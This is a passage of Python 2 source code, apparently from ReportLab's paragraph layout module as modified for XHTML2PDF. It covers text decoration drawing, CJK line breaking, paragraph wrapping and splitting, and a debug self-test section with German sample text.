ff 1/8 of the font size
y0 The "baseline" postion ???
y 1/8 below the baseline
"""
xs = tx.XtraState
leading = xs.style.leading
autoLeading = xs.autoLeading
f = xs.f
if autoLeading=='max':
# leading = max(leading, f.fontSize)
leading = max(leading, LEADING_FACTOR*f.fontSize)
elif autoLeading=='min':
leading = LEADING_FACTOR*f.fontSize
ff = 0.125*f.fontSize
y0 = xs.cur_y
y = y0 - ff
# Background
for x1, x2, c, fs in xs.backgrounds:
inlineFF = fs * 0.125
gap = inlineFF * 1.25
tx._canvas.setFillColor(c)
tx._canvas.rect(x1, y - gap, x2 - x1, fs + 1, fill=1, stroke=0)
# tx._canvas.rect(x1, y, x2 - x1, fs, fill=1, stroke=0)
xs.backgrounds = []
xs.background = 0
xs.backgroundColor = None
xs.backgroundFontSize = None
# Underline
yUnderline = y0 - 1.5 * ff
tx._canvas.setLineWidth(ff * 0.75)
csc = None
for x1,x2,c in xs.underlines:
if c!=csc:
tx._canvas.setStrokeColor(c)
csc = c
tx._canvas.line(x1, yUnderline, x2, yUnderline)
xs.underlines = []
xs.underline=0
xs.underlineColor=None
# Strike
for x1,x2,c,fs in xs.strikes:
inlineFF = fs * 0.125
ys = y0 + 2 * inlineFF
if c!=csc:
tx._canvas.setStrokeColor(c)
csc = c
tx._canvas.setLineWidth(inlineFF * 0.75)
tx._canvas.line(x1, ys, x2, ys)
xs.strikes = []
xs.strike=0
xs.strikeColor=None
yl = y + leading
for x1,x2,link,c in xs.links:
# No automatic underlining for links, never!
_doLink(tx, link, (x1, y, x2, yl))
xs.links = []
xs.link=None
xs.linkColor=None
xs.cur_y -= leading
def textTransformFrags(frags,style):
tt = style.textTransform
if tt:
tt=tt.lower()
if tt=='lowercase':
tt = unicode.lower
elif tt=='uppercase':
tt = unicode.upper
elif tt=='capitalize':
tt = unicode.title
elif tt=='none':
return
else:
raise ValueError('ParaStyle.textTransform value %r is invalid' % style.textTransform)
n = len(frags)
if n==1:
#single fragment the easy case
frags[0].text = tt(frags[0].text.decode('utf8')).encode('utf8')
elif tt is unicode.title:
pb = True
for f in frags:
t = f.text
if not t: continue
u = t.decode('utf8')
if u.startswith(u' ') or pb:
u = tt(u)
else:
i = u.find(u' ')
if i>=0:
u = u[:i]+tt(u[i:])
pb = u.endswith(u' ')
f.text = u.encode('utf8')
else:
for f in frags:
t = f.text
if not t: continue
f.text = tt(t.decode('utf8')).encode('utf8')
class cjkU(unicode):
'''simple class to hold the frag corresponding to a str'''
def __new__(cls,value,frag,encoding):
self = unicode.__new__(cls,value)
self._frag = frag
if hasattr(frag,'cbDefn'):
w = getattr(frag.cbDefn,'width',0)
self._width = w
else:
self._width = stringWidth(value,frag.fontName,frag.fontSize)
return self
frag = property(lambda self: self._frag)
width = property(lambda self: self._width)
def makeCJKParaLine(U,extraSpace,calcBounds):
words = []
CW = []
f0 = FragLine()
maxSize = maxAscent = minDescent = 0
for u in U:
f = u.frag
fontSize = f.fontSize
if calcBounds:
cbDefn = getattr(f,'cbDefn',None)
if getattr(cbDefn,'width',0):
descent, ascent = imgVRange(cbDefn.height,cbDefn.valign,fontSize)
else:
ascent, descent = getAscentDescent(f.fontName,fontSize)
else:
ascent, descent = getAscentDescent(f.fontName,fontSize)
maxSize = max(maxSize,fontSize)
maxAscent = max(maxAscent,ascent)
minDescent = min(minDescent,descent)
if not _sameFrag(f0,f):
f0=f0.clone()
f0.text = u''.join(CW)
words.append(f0)
CW = []
f0 = f
CW.append(u)
if CW:
f0=f0.clone()
f0.text = u''.join(CW)
words.append(f0)
return FragLine(kind=1,extraSpace=extraSpace,wordCount=1,words=words[1:],fontSize=maxSize,ascent=maxAscent,descent=minDescent)
def cjkFragSplit(frags, maxWidths, calcBounds, encoding='utf8'):
'''This attempts to be wordSplit for frags using the dumb algorithm'''
from reportlab.rl_config import _FUZZ
U = [] #get a list of single glyphs with their widths etc etc
for f in frags:
text = f.text
if not isinstance(text,unicode):
text = text.decode(encoding)
if text:
U.extend([cjkU(t,f,encoding) for t in text])
else:
U.append(cjkU(text,f,encoding))
lines = []
widthUsed = lineStartPos = 0
maxWidth = maxWidths[0]
for i, u in enumerate(U):
w = u.width
widthUsed += w
lineBreak = hasattr(u.frag,'lineBreak')
endLine = (widthUsed>maxWidth + _FUZZ and widthUsed>0) or lineBreak
if endLine:
if lineBreak: continue
extraSpace = maxWidth - widthUsed + w
#This is the most important of the Japanese typography rules.
#if next character cannot start a line, wrap it up to this line so it hangs
#in the right margin. We won't do two or more though - that's unlikely and
#would result in growing ugliness.
nextChar = U[i]
if nextChar in ALL_CANNOT_START:
extraSpace -= w
i += 1
lines.append(makeCJKParaLine(U[lineStartPos:i],extraSpace,calcBounds))
try:
maxWidth = maxWidths[len(lines)]
except IndexError:
maxWidth = maxWidths[-1] # use the last one
lineStartPos = i
widthUsed = w
i -= 1
#any characters left?
if widthUsed > 0:
lines.append(makeCJKParaLine(U[lineStartPos:],maxWidth-widthUsed,calcBounds))
return ParaLines(kind=1,lines=lines)
class Paragraph(Flowable):
""" Paragraph(text, style, bulletText=None, caseSensitive=1)
text a string of stuff to go into the paragraph.
style is a style definition as in reportlab.lib.styles.
bulletText is an optional bullet defintion.
caseSensitive set this to 0 if you want the markup tags and their attributes to be case-insensitive.
This class is a flowable that can format a block of text
into a paragraph with a given style.
The paragraph Text can contain XML-like markup including the tags:
<b> ... </b> - bold
<i> ... </i> - italics
<u> ... </u> - underline
<strike> ... </strike> - strike through
<super> ... </super> - superscript
<sub> ... </sub> - subscript
<font name=fontfamily/fontname color=colorname size=float>
<onDraw name=callable label="a label">
<link>link text</link>
attributes of links
size/fontSize=num
name/face/fontName=name
fg/textColor/color=color
backcolor/backColor/bgcolor=color
dest/destination/target/href/link=target
<a>anchor text</a>
attributes of anchors
fontSize=num
fontName=name
fg/textColor/color=color
backcolor/backColor/bgcolor=color
href=href
<a name="anchorpoint"/>
<unichar name="unicode character name"/>
<unichar value="unicode code point"/>
<img src="path" width="1in" height="1in" valign="bottom"/>
The whole may be surrounded by <para> </para> tags
The <b> and <i> tags will work for the built-in fonts (Helvetica
/Times / Courier). For other fonts you need to register a family
of 4 fonts using reportlab.pdfbase.pdfmetrics.registerFont; then
use the addMapping function to tell the library that these 4 fonts
form a family e.g.
from reportlab.lib.fonts import addMapping
addMapping('Vera', 0, 0, 'Vera') #normal
addMapping('Vera', 0, 1, 'Vera-Italic') #italic
addMapping('Vera', 1, 0, 'Vera-Bold') #bold
addMapping('Vera', 1, 1, 'Vera-BoldItalic') #italic and bold
It will also be able to handle any MathML specified Greek characters.
"""
def __init__(self, text, style, bulletText = None, frags=None, caseSensitive=1, encoding='utf8'):
self.caseSensitive = caseSensitive
self.encoding = encoding
self._setup(text, style, bulletText, frags, cleanBlockQuotedText)
def __repr__(self):
n = self.__class__.__name__
L = [n+"("]
keys = self.__dict__.keys()
for k in keys:
v = getattr(self, k)
rk = repr(k)
rv = repr(v)
rk = " "+rk.replace("\n", "\n ")
rv = " "+rk.replace("\n", "\n ")
L.append(rk)
L.append(rv)
L.append(") #"+n)
return '\n'.join(L)
def _setup(self, text, style, bulletText, frags, cleaner):
if frags is None:
text = cleaner(text)
_parser.caseSensitive = self.caseSensitive
style, frags, bulletTextFrags = _parser.parse(text,style)
if frags is None:
raise ValueError("xml parser error (%s) in paragraph beginning\n'%s'"\
% (_parser.errors[0],text[:min(30,len(text))]))
textTransformFrags(frags,style)
if bulletTextFrags: bulletText = bulletTextFrags
#AR hack
self.text = text
self.frags = frags
self.style = style
self.bulletText = bulletText
self.debug = PARAGRAPH_DEBUG #turn this on to see a pretty one with all the margins etc.
def wrap(self, availWidth, availHeight):
if self.debug:
print id(self), "wrap"
try:
print repr(self.getPlainText()[:80])
except:
print "???"
# work out widths array for breaking
self.width = availWidth
style = self.style
leftIndent = style.leftIndent
first_line_width = availWidth - (leftIndent+style.firstLineIndent) - style.rightIndent
later_widths = availWidth - leftIndent - style.rightIndent
if style.wordWrap == 'CJK':
#use Asian text wrap algorithm to break characters
blPara = self.breakLinesCJK([first_line_width, later_widths])
else:
blPara = self.breakLines([first_line_width, later_widths])
self.blPara = blPara
autoLeading = getattr(self,'autoLeading',getattr(style,'autoLeading',''))
leading = style.leading
if blPara.kind==1 and autoLeading not in ('','off'):
height = 0
if autoLeading=='max':
for l in blPara.lines:
height += max(l.ascent-l.descent,leading)
elif autoLeading=='min':
for l in blPara.lines:
height += l.ascent - l.descent
else:
raise ValueError('invalid autoLeading value %r' % autoLeading)
else:
if autoLeading=='max':
leading = max(leading,LEADING_FACTOR*style.fontSize)
elif autoLeading=='min':
leading = LEADING_FACTOR*style.fontSize
height = len(blPara.lines) * leading
self.height = height
return self.width, height
def minWidth(self):
'Attempt to determine a minimum sensible width'
frags = self.frags
nFrags= len(frags)
if not nFrags: return 0
if nFrags==1:
f = frags[0]
fS = f.fontSize
fN = f.fontName
words = hasattr(f,'text') and split(f.text, ' ') or f.words
func = lambda w, fS=fS, fN=fN: stringWidth(w,fN,fS)
else:
words = _getFragWords(frags)
func = lambda x: x[0]
return max(map(func,words))
def _get_split_blParaFunc(self):
return self.blPara.kind==0 and _split_blParaSimple or _split_blParaHard
def split(self,availWidth, availHeight):
if self.debug:
print id(self), "split"
if len(self.frags)<=0: return []
#the split information is all inside self.blPara
if not hasattr(self,'blPara'):
# return []
self.wrap(availWidth,availHeight)
blPara = self.blPara
style = self.style
autoLeading = getattr(self,'autoLeading',getattr(style,'autoLeading',''))
leading = style.leading
lines = blPara.lines
if blPara.kind==1 and autoLeading not in ('','off'):
s = height = 0
if autoLeading=='max':
for i,l in enumerate(blPara.lines):
h = max(l.ascent-l.descent,leading)
n = height+h
if n>availHeight+1e-8:
break
height = n
s = i+1
elif autoLeading=='min':
for i,l in enumerate(blPara.lines):
n = height+l.ascent-l.descent
if n>availHeight+1e-8:
break
height = n
s = i+1
else:
raise ValueError('invalid autoLeading value %r' % autoLeading)
else:
l = leading
if autoLeading=='max':
l = max(leading,LEADING_FACTOR*style.fontSize)
elif autoLeading=='min':
l = LEADING_FACTOR*style.fontSize
s = int(availHeight/l)
height = s*l
n = len(lines)
allowWidows = getattr(self,'allowWidows',getattr(self,'allowWidows',1))
allowOrphans = getattr(self,'allowOrphans',getattr(self,'allowOrphans',0))
if not allowOrphans:
if s<=1: #orphan?
del self.blPara
return []
if n<=s: return [self]
if not allowWidows:
if n==s+1: #widow?
if (allowOrphans and n==3) or n>3:
s -= 1 #give the widow some company
else:
del self.blPara #no room for adjustment; force the whole para onwards
return []
func = self._get_split_blParaFunc()
P1=self.__class__(None,style,bulletText=self.bulletText,frags=func(blPara,0,s))
#this is a major hack
P1.blPara = ParaLines(kind=1,lines=blPara.lines[0:s],aH=availHeight,aW=availWidth)
P1._JustifyLast = 1
P1._splitpara = 1
P1.height = height
P1.width = availWidth
if style.firstLineIndent != 0:
style = deepcopy(style)
style.firstLineIndent = 0
P2=self.__class__(None,style,bulletText=None,frags=func(blPara,s,n))
for a in ('autoLeading', #possible attributes that might be directly on self.
):
if hasattr(self,a):
setattr(P1,a,getattr(self,a))
setattr(P2,a,getattr(self,a))
return [P1,P2]
def draw(self):
#call another method for historical reasons. Besides, I
#suspect I will be playing with alternate drawing routines
#so not doing it here makes it easier to switch.
self.drawPara(self.debug)
def breakLines(self, width):
"""
Returns a broken line structure. There are two cases
A) For the simple case of a single formatting input fragment the output is
A fragment specifier with
- kind = 0
- fontName, fontSize, leading, textColor
- lines= A list of lines
Each line has two items.
1. unused width in points
2. word list
B) When there is more than one input formatting fragment the output is
A fragment specifier with
- kind = 1
- lines= A list of fragments each having fields
- extraspace (needed for justified)
- fontSize
- words=word list
each word is itself a fragment with
various settings
This structure can be used to easily draw paragraphs with the various alignments.
You can supply either a single width or a list of widths; the latter will have its
last item repeated until necessary. A 2-element list is useful when there is a
different first line indent; a longer list could be created to facilitate custom wraps
around irregular objects."""
if self.debug:
print id(self), "breakLines"
if not isinstance(width,(tuple,list)): maxWidths = [width]
else: maxWidths = width
lines = []
lineno = 0
style = self.style
#for bullets, work out width and ensure we wrap the right amount onto line one
_handleBulletWidth(self.bulletText,style,maxWidths)
maxWidth = maxWidths[0]
self.height = 0
autoLeading = getattr(self,'autoLeading',getattr(style,'autoLeading',''))
calcBounds = autoLeading not in ('','off')
frags = self.frags
nFrags= len(frags)
if nFrags==1 and not hasattr(frags[0],'cbDefn'):
f = frags[0]
fontSize = f.fontSize
fontName = f.fontName
ascent, descent = getAscentDescent(fontName,fontSize)
words = hasattr(f,'text') and split(f.text, ' ') or f.words
spaceWidth = stringWidth(' ', fontName, fontSize, self.encoding)
cLine = []
currentWidth = -spaceWidth # hack to get around extra space for word 1
for word in words:
#this underscores my feeling that Unicode throughout would be easier!
wordWidth = stringWidth(word, fontName, fontSize, self.encoding)
newWidth = currentWidth + spaceWidth + wordWidth
if newWidth <= maxWidth or not len(cLine):
# fit one more on this line
cLine.append(word)
currentWidth = newWidth
else:
if currentWidth > self.width: self.width = currentWidth
#end of line
lines.append((maxWidth - currentWidth, cLine))
cLine = [word]
currentWidth = wordWidth
lineno += 1
try:
maxWidth = maxWidths[lineno]
except IndexError:
maxWidth = maxWidths[-1] # use the last one
#deal with any leftovers on the final line
if cLine!=[]:
if currentWidth>self.width: self.width = currentWidth
lines.append((maxWidth - currentWidth, cLine))
return f.clone(kind=0, lines=lines,ascent=ascent,descent=descent,fontSize=fontSize)
elif nFrags<=0:
return ParaLines(kind=0, fontSize=style.fontSize, fontName=style.fontName,
textColor=style.textColor, ascent=style.fontSize,descent=-0.2*style.fontSize,
lines=[])
else:
if hasattr(self,'blPara') and getattr(self,'_splitpara',0):
#NB this is an utter hack that awaits the proper information
#preserving splitting algorithm
return self.blPara
n = 0
words = []
for w in _getFragWords(frags):
f=w[-1][0]
fontName = f.fontName
fontSize = f.fontSize
spaceWidth = stringWidth(' ',fontName, fontSize)
if not words:
currentWidth = -spaceWidth # hack to get around extra space for word 1
maxSize = fontSize
maxAscent, minDescent = getAscentDescent(fontName,fontSize)
wordWidth = w[0]
f = w[1][0]
if wordWidth>0:
newWidth = currentWidth + spaceWidth + wordWidth
else:
newWidth = currentWidth
#test to see if this frag is a line break. If it is we will only act on it
#if the current width is non-negative or the previous thing was a deliberate lineBreak
lineBreak = hasattr(f,'lineBreak')
endLine = (newWidth>maxWidth and n>0) or lineBreak
if not endLine:
if lineBreak: continue #throw it away
nText = w[1][1]
if nText: n += 1
fontSize = f.fontSize
if calcBounds:
cbDefn = getattr(f,'cbDefn',None)
if getattr(cbDefn,'width',0):
descent,ascent = imgVRange(cbDefn.height,cbDefn.valign,fontSize)
else:
ascent, descent = getAscentDescent(f.fontName,fontSize)
else:
ascent, descent = getAscentDescent(f.fontName,fontSize)
maxSize = max(maxSize,fontSize)
maxAscent = max(maxAscent,ascent)
minDescent = min(minDescent,descent)
if not words:
g = f.clone()
words = [g]
g.text = nText
elif not _sameFrag(g,f):
if currentWidth>0 and ((nText!='' and nText[0]!=' ') or hasattr(f,'cbDefn')):
if hasattr(g,'cbDefn'):
i = len(words)-1
while i>=0:
wi = words[i]
cbDefn = getattr(wi,'cbDefn',None)
if cbDefn:
if not getattr(cbDefn,'width',0):
i -= 1
continue
if not wi.text.endswith(' '):
wi.text += ' '
break
else:
if not g.text.endswith(' '):
g.text += ' '
g = f.clone()
words.append(g)
g.text = nText
else:
if nText!='' and nText[0]!=' ':
g.text += ' ' + nText
for i in w[2:]:
g = i[0].clone()
g.text=i[1]
words.append(g)
fontSize = g.fontSize
if calcBounds:
cbDefn = getattr(g,'cbDefn',None)
if getattr(cbDefn,'width',0):
descent,ascent = imgVRange(cbDefn.height,cbDefn.valign,fontSize)
else:
ascent, descent = getAscentDescent(g.fontName,fontSize)
else:
ascent, descent = getAscentDescent(g.fontName,fontSize)
maxSize = max(maxSize,fontSize)
maxAscent = max(maxAscent,ascent)
minDescent = min(minDescent,descent)
currentWidth = newWidth
else: #either it won't fit, or it's a lineBreak tag
if lineBreak:
g = f.clone()
#del g.lineBreak
words.append(g)
if currentWidth>self.width: self.width = currentWidth
#end of line
lines.append(FragLine(extraSpace=maxWidth-currentWidth, wordCount=n,
lineBreak=lineBreak, words=words, fontSize=maxSize, ascent=maxAscent, descent=minDescent))
#start new line
lineno += 1
try:
maxWidth = maxWidths[lineno]
except IndexError:
maxWidth = maxWidths[-1] # use the last one
if lineBreak:
n = 0
words = []
continue
currentWidth = wordWidth
n = 1
g = f.clone()
maxSize = g.fontSize
if calcBounds:
cbDefn = getattr(g,'cbDefn',None)
if getattr(cbDefn,'width',0):
minDescent,maxAscent = imgVRange(cbDefn.height,cbDefn.valign,maxSize)
else:
maxAscent, minDescent = getAscentDescent(g.fontName,maxSize)
else:
maxAscent, minDescent = getAscentDescent(g.fontName,maxSize)
words = [g]
g.text = w[1][1]
for i in w[2:]:
g = i[0].clone()
g.text=i[1]
words.append(g)
fontSize = g.fontSize
if calcBounds:
cbDefn = getattr(g,'cbDefn',None)
if getattr(cbDefn,'width',0):
descent,ascent = imgVRange(cbDefn.height,cbDefn.valign,fontSize)
else:
ascent, descent = getAscentDescent(g.fontName,fontSize)
else:
ascent, descent = getAscentDescent(g.fontName,fontSize)
maxSize = max(maxSize,fontSize)
maxAscent = max(maxAscent,ascent)
minDescent = min(minDescent,descent)
#deal with any leftovers on the final line
if words!=[]:
if currentWidth>self.width: self.width = currentWidth
lines.append(ParaLines(extraSpace=(maxWidth - currentWidth),wordCount=n,
words=words, fontSize=maxSize,ascent=maxAscent,descent=minDescent))
return ParaLines(kind=1, lines=lines)
return lines
def breakLinesCJK(self, width):
"""Initially, the dumbest possible wrapping algorithm.
Cannot handle font variations."""
if self.debug:
print id(self), "breakLinesCJK"
if not isinstance(width,(list,tuple)): maxWidths = [width]
else: maxWidths = width
style = self.style
#for bullets, work out width and ensure we wrap the right amount onto line one
_handleBulletWidth(self.bulletText, style, maxWidths)
if len(self.frags)>1:
autoLeading = getattr(self,'autoLeading',getattr(style,'autoLeading',''))
calcBounds = autoLeading not in ('','off')
return cjkFragSplit(self.frags, maxWidths, calcBounds)
#raise ValueError('CJK Wordwrap can only handle one fragment per paragraph for now. Tried to handle:\ntext: %s\nfrags: %s' % (self.text, self.frags))
elif not len(self.frags):
return ParaLines(kind=0, fontSize=style.fontSize, fontName=style.fontName,
textColor=style.textColor, lines=[],ascent=style.fontSize,descent=-0.2*style.fontSize)
f = self.frags[0]
if 1 and hasattr(self,'blPara') and getattr(self,'_splitpara',0):
#NB this is an utter hack that awaits the proper information
#preserving splitting algorithm
return f.clone(kind=0, lines=self.blPara.lines)
lines = []
lineno = 0
self.height = 0
f = self.frags[0]
if hasattr(f,'text'):
text = f.text
else:
text = ''.join(getattr(f,'words',[]))
from reportlab.lib.textsplit import wordSplit
lines = wordSplit(text, maxWidths[0], f.fontName, f.fontSize)
#the paragraph drawing routine assumes multiple frags per line, so we need an
#extra list like this
# [space, [text]]
#
wrappedLines = [(sp, [line]) for (sp, line) in lines]
return f.clone(kind=0, lines=wrappedLines, ascent=f.fontSize, descent=-0.2*f.fontSize)
def beginText(self, x, y):
return self.canv.beginText(x, y)
def drawPara(self,debug=0):
"""Draws a paragraph according to the given style.
Returns the final y position at the bottom. Not safe for
paragraphs without spaces e.g. Japanese; wrapping
algorithm will go infinite."""
if self.debug:
print id(self), "drawPara", self.blPara.kind
#stash the key facts locally for speed
canvas = self.canv
style = self.style
blPara = self.blPara
lines = blPara.lines
leading = style.leading
autoLeading = getattr(self,'autoLeading',getattr(style,'autoLeading',''))
#work out the origin for line 1
leftIndent = style.leftIndent
cur_x = leftIndent
if debug:
bw = 0.5
bc = Color(1,1,0)
bg = Color(0.9,0.9,0.9)
else:
bw = getattr(style,'borderWidth',None)
bc = getattr(style,'borderColor',None)
bg = style.backColor
#if has a background or border, draw it
if bg or (bc and bw):
canvas.saveState()
op = canvas.rect
kwds = dict(fill=0,stroke=0)
if bc and bw:
canvas.setStrokeColor(bc)
canvas.setLineWidth(bw)
kwds['stroke'] = 1
br = getattr(style,'borderRadius',0)
if br and not debug:
op = canvas.roundRect
kwds['radius'] = br
if bg:
canvas.setFillColor(bg)
kwds['fill'] = 1
bp = getattr(style,'borderPadding',0)
op(leftIndent-bp,
-bp,
self.width - (leftIndent+style.rightIndent)+2*bp,
self.height+2*bp,
**kwds)
canvas.restoreState()
nLines = len(lines)
bulletText = self.bulletText
if nLines > 0:
_offsets = getattr(self,'_offsets',[0])
_offsets += (nLines-len(_offsets))*[_offsets[-1]]
canvas.saveState()
#canvas.addLiteral('%% %s.drawPara' % _className(self))
alignment = style.alignment
offset = style.firstLineIndent+_offsets[0]
lim = nLines-1
noJustifyLast = not (hasattr(self,'_JustifyLast') and self._JustifyLast)
if blPara.kind==0:
if alignment == TA_LEFT:
dpl = _leftDrawParaLine
elif alignment == TA_CENTER:
dpl = _centerDrawParaLine
elif self.style.alignment == TA_RIGHT:
dpl = _rightDrawParaLine
elif self.style.alignment == TA_JUSTIFY:
dpl = _justifyDrawParaLine
f = blPara
cur_y = self.height - getattr(f,'ascent',f.fontSize) #TODO fix XPreformatted to remove this hack
if bulletText:
offset = _drawBullet(canvas,offset,cur_y,bulletText,style)
#set up the font etc.
canvas.setFillColor(f.textColor)
tx = self.beginText(cur_x, cur_y)
if autoLeading=='max':
leading = max(leading,LEADING_FACTOR*f.fontSize)
elif autoLeading=='min':
leading = LEADING_FACTOR*f.fontSize
#now the font for the rest of the paragraph
tx.setFont(f.fontName, f.fontSize, leading)
ws = lines[0][0]
t_off = dpl( tx, offset, ws, lines[0][1], noJustifyLast and nLines==1)
if f.underline or f.link or f.strike:
xs = tx.XtraState = ABag()
xs.cur_y = cur_y
xs.f = f
xs.style = style
xs.lines = lines
xs.underlines = []
xs.underlineColor = None
# XXX Modified for XHTML2PDF
xs.backgrounds = []
xs.backgroundColor = None
xs.backgroundFontSize = None
xs.strikes = []
xs.strikeColor = None
# XXX Modified for XHTML2PDF
xs.strikeFontSize = None
xs.links = []
xs.link = f.link
canvas.setStrokeColor(f.textColor)
dx = t_off + leftIndent
if dpl != _justifyDrawParaLine: ws = 0
# XXX Never underline!
underline = f.underline
strike = f.strike
link = f.link
if underline: _do_under_line(0, dx, ws, tx)
if strike: _do_under_line(0, dx, ws, tx, lm=0.125)
if link: _do_link_line(0, dx, ws, tx)
#now the middle of the paragraph, aligned with the left margin which is our origin.
for i in xrange(1, nLines):
ws = lines[i][0]
t_off = dpl( tx, _offsets[i], ws, lines[i][1], noJustifyLast and i==lim)
if dpl!=_justifyDrawParaLine: ws = 0
if underline: _do_under_line(i, t_off+leftIndent, ws, tx)
if strike: _do_under_line(i, t_off+leftIndent, ws, tx, lm=0.125)
if link: _do_link_line(i, t_off+leftIndent, ws, tx)
else:
for i in xrange(1, nLines):
dpl( tx, _offsets[i], lines[i][0], lines[i][1], noJustifyLast and i==lim)
else:
f = lines[0]
cur_y = self.height - getattr(f,'ascent',f.fontSize) #TODO fix XPreformatted to remove this hack
# default?
dpl = _leftDrawParaLineX
if bulletText:
oo = offset
offset = _drawBullet(canvas,offset,cur_y,bulletText,style)
if alignment == TA_LEFT:
dpl = _leftDrawParaLineX
elif alignment == TA_CENTER:
dpl = _centerDrawParaLineX
elif self.style.alignment == TA_RIGHT:
dpl = _rightDrawParaLineX
elif self.style.alignment == TA_JUSTIFY:
dpl = _justifyDrawParaLineX
else:
raise ValueError("bad align %s" % repr(alignment))
#set up the font etc.
tx = self.beginText(cur_x, cur_y)
xs = tx.XtraState = ABag()
xs.textColor = None
# XXX Modified for XHTML2PDF
xs.backColor = None
xs.rise = 0
xs.underline = 0
xs.underlines = []
xs.underlineColor = None
# XXX Modified for XHTML2PDF
xs.background = 0
xs.backgrounds = []
xs.backgroundColor = None
xs.backgroundFontSize = None
xs.strike = 0
xs.strikes = []
xs.strikeColor = None
# XXX Modified for XHTML2PDF
xs.strikeFontSize = None
xs.links = []
xs.link = None
xs.leading = style.leading
xs.leftIndent = leftIndent
tx._leading = None
tx._olb = None
xs.cur_y = cur_y
xs.f = f
xs.style = style
xs.autoLeading = autoLeading
tx._fontname,tx._fontsize = None, None
dpl( tx, offset, lines[0], noJustifyLast and nLines==1)
_do_post_text(tx)
#now the middle of the paragraph, aligned with the left margin which is our origin.
for i in xrange(1, nLines):
f = lines[i]
dpl( tx, _offsets[i], f, noJustifyLast and i==lim)
_do_post_text(tx)
canvas.drawText(tx)
canvas.restoreState()
def getPlainText(self,identify=None):
"""Convenience function for templates which want access
to the raw text, without XML tags. """
frags = getattr(self,'frags',None)
if frags:
plains = []
for frag in frags:
if hasattr(frag, 'text'):
plains.append(frag.text)
return join(plains, '')
elif identify:
text = getattr(self,'text',None)
if text is None: text = repr(self)
return text
else:
return ''
def getActualLineWidths0(self):
"""Convenience function; tells you how wide each line
actually is. For justified styles, this will be
the same as the wrap width; for others it might be
useful for seeing if paragraphs will fit in spaces."""
assert hasattr(self, 'width'), "Cannot call this method before wrap()"
if self.blPara.kind:
func = lambda frag, w=self.width: w - frag.extraSpace
else:
func = lambda frag, w=self.width: w - frag[0]
return map(func,self.blPara.lines)
if __name__=='__main__': #NORUNTESTS
def dumpParagraphLines(P):
print 'dumpParagraphLines(<Paragraph @ %d>)' % id(P)
lines = P.blPara.lines
for l,line in enumerate(lines):
line = lines[l]
if hasattr(line,'words'):
words = line.words
else:
words = line[1]
nwords = len(words)
print 'line%d: %d(%s)\n ' % (l,nwords,str(getattr(line,'wordCount','Unknown'))),
for w in xrange(nwords):
print "%d:'%s'"%(w,getattr(words[w],'text',words[w])),
print
def fragDump(w):
R= ["'%s'" % w[1]]
for a in ('fontName', 'fontSize', 'textColor', 'rise', 'underline', 'strike', 'link', 'cbDefn','lineBreak'):
if hasattr(w[0],a):
R.append('%s=%r' % (a,getattr(w[0],a)))
return ', '.join(R)
def dumpParagraphFrags(P):
print 'dumpParagraphFrags(<Paragraph @ %d>) minWidth() = %.2f' % (id(P), P.minWidth())
frags = P.frags
n =len(frags)
for l in xrange(n):
print "frag%d: '%s' %s" % (l, frags[l].text,' '.join(['%s=%s' % (k,getattr(frags[l],k)) for k in frags[l].__dict__ if k!=text]))
l = 0
cum = 0
for W in _getFragWords(frags):
cum += W[0]
print "fragword%d: cum=%3d size=%d" % (l, cum, W[0]),
for w in W[1:]:
print '(%s)' % fragDump(w),
print
l += 1
from reportlab.lib.styles import getSampleStyleSheet, ParagraphStyle
from reportlab.lib.units import cm
import sys
TESTS = sys.argv[1:]
if TESTS==[]: TESTS=['4']
def flagged(i,TESTS=TESTS):
return 'all' in TESTS or '*' in TESTS or str(i) in TESTS
styleSheet = getSampleStyleSheet()
B = styleSheet['BodyText']
style = ParagraphStyle("discussiontext", parent=B)
style.fontName= 'Helvetica'
if flagged(1):
text='''The <font name=courier color=green>CMYK</font> or subtractive method follows the way a printer
mixes three pigments (cyan, magenta, and yellow) to form colors.
Because mixing chemicals is more difficult than combining light there
is a fourth parameter for darkness. For example a chemical
combination of the <font name=courier color=green>CMY</font> pigments generally never makes a perfect
black -- instead producing a muddy color -- so, to get black printers
don't use the <font name=courier color=green>CMY</font> pigments but use a direct black ink. Because
<font name=courier color=green>CMYK</font> maps more directly to the way printer hardware works it may
be the case that &| & | colors specified in <font name=courier color=green>CMYK</font> will provide better fidelity
and better control when printed.
'''
P=Paragraph(text,style)
dumpParagraphFrags(P)
aW, aH = 456.0, 42.8
w,h = P.wrap(aW, aH)
dumpParagraphLines(P)
S = P.split(aW,aH)
for s in S:
s.wrap(aW,aH)
dumpParagraphLines(s)
aH = 500
if flagged(2):
P=Paragraph("""Price<super><font color="red">*</font></super>""", styleSheet['Normal'])
dumpParagraphFrags(P)
w,h = P.wrap(24, 200)
dumpParagraphLines(P)
if flagged(3):
text = """Dieses Kapitel bietet eine schnelle <b><font color=red>Programme :: starten</font></b>
<onDraw name=myIndex label="Programme :: starten">
<b><font color=red>Eingabeaufforderung :: (>>>)</font></b>
<onDraw name=myIndex label="Eingabeaufforderung :: (>>>)">
<b><font color=red>>>> (Eingabeaufforderung)</font></b>
<onDraw name=myIndex label=">>> (Eingabeaufforderung)">
Einführung in Python <b><font color=red>Python :: Einführung</font></b>
<onDraw name=myIndex label="Python :: Einführung">.
Das Ziel ist, die grundlegenden Eigenschaften von Python darzustellen, ohne
sich zu sehr in speziellen Regeln oder Details zu verstricken. Dazu behandelt
dieses Kapitel kurz die wesentlichen Konzepte wie Variablen, Ausdrücke,
Kontrollfluss, Funktionen sowie Ein- und Ausgabe. Es erhebt nicht den Anspruch,
umfassend zu sein."""
P=Paragraph(text, styleSheet['Code'])
dumpParagraphFrags(P)
w,h = P.wrap(6*72, 9.7*72)
dumpParagraphLines(P)
if flagged(4):
text='''Die eingebaute Funktion <font name=Courier>range(i, j [, stride])</font><onDraw name=myIndex label="eingebaute Funktionen::range()"><onDraw name=myIndex label="range() (Funktion)"><onDraw name=myIndex label="Funktionen::range()"> erzeugt eine Liste von Ganzzahlen und füllt sie mit Werten <font name=Courier>k</font>, für die gilt: <font name=Courier>i <= k < j</font>. Man kann auch eine optionale Schrittweite angeben. Die eingebaute Funktion <font name=Courier>xrange()</font><onDraw name=myIndex label="eingebaute Funktionen::xrange()"><onDraw name=myIndex label="xrange() (Funktion)"><onDraw name=myIndex label="Funktionen::xrange()"> erfüllt einen ähnlichen Zweck, gibt aber eine unveränderliche Sequenz vom Typ <font name=Courier>XRangeType</font><onDraw name=myIndex label="XRangeType"> zurück. Anstatt alle Werte in der Liste abzuspeichern, berechnet diese Liste ihre Werte, wann immer sie angefordert werden. Das ist sehr viel speicherschonender, wenn mit sehr langen Listen von Ganzzahlen gearbeitet wird. <font name=Courier>XRangeType</font> 